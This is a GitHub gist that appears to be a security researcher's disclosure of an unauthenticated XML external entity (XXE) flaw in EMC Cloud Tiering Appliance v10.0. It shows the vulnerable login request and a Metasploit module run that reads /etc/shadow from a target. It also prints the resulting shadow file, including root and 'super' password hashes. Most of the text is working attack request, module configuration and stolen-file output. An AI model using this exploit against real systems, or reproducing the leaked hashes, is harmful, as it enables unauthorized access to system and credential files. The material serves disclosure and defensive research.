Skip to content

Instantly share code, notes, and snippets.

@brandonprry
Last active August 29, 2015 13:57
Show Gist options
  • Save brandonprry/9895721 to your computer and use it in GitHub Desktop.
Save brandonprry/9895721 to your computer and use it in GitHub Desktop.
EMC CTA unauthed XXE with root perms
EMC Cloud Tiering Appliance v10.0 Unauthed XXE
The following authentication request is susceptible to an XXE attack:
POST /api/login HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=12818F1AC5C744CF444B2683ABF6E8AC
Connection: keep-alive
Referer: https://172.31.16.99/UxFramework/UxFlashApplication.swf
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
<Request>
<Username>root</Username>
<Password>114,97,105,110</Password>
</Request>
-------------------------------
Quick run:
msf auxiliary(emc_cta_xxe) > show options
Module options (auxiliary/gather/emc_cta_xxe):
Name Current Setting Required Description
---- --------------- -------- -----------
FILEPATH /etc/shadow yes The filepath to read on the server
Proxies http:127.0.0.1:8080 no Use a proxy chain
RHOST 172.31.16.99 yes The target address
RPORT 443 yes The target port
TARGETURI / yes Base directory path
VHOST no HTTP server virtual host
msf auxiliary(emc_cta_xxe) > run
[+] File saved to: /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt
[*] Auxiliary module execution completed
msf auxiliary(emc_cta_xxe) > cat /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt
[*] exec: cat /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt
root:u4sA.C2vNqNF.:15913::::::
bin:*:15913:0:99999:0:0::
daemon:*:15913:0:99999:0:0::
lp:*:15913:0:99999:0:0::
mail:*:15913:0:99999:0:0::
news:*:15913:0:99999:0:0::
uucp:*:15913:0:99999:0:0::
man:*:15913:0:99999:0:0::
wwwrun:*:15913:0:99999:0:0::
ftp:*:15913:0:99999:0:0::
nobody:*:15913:0:99999:0:0::
messagebus:*:15913:0:99999:0:0::
polkituser:*:15913:0:99999:0:0::
haldaemon:*:15913:0:99999:0:0::
sshd:*:15913:0:99999:0:0::
uuidd:*:15913:0:99999:0:0::
postgres:*:15913:0:99999:0:0::
ntp:*:15913:0:99999:0:0::
suse-ncc:*:15913:0:99999:0:0::
super:u4sA.C2vNqNF.:15913:0:99999:0:0::
msf auxiliary(emc_cta_xxe) >
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment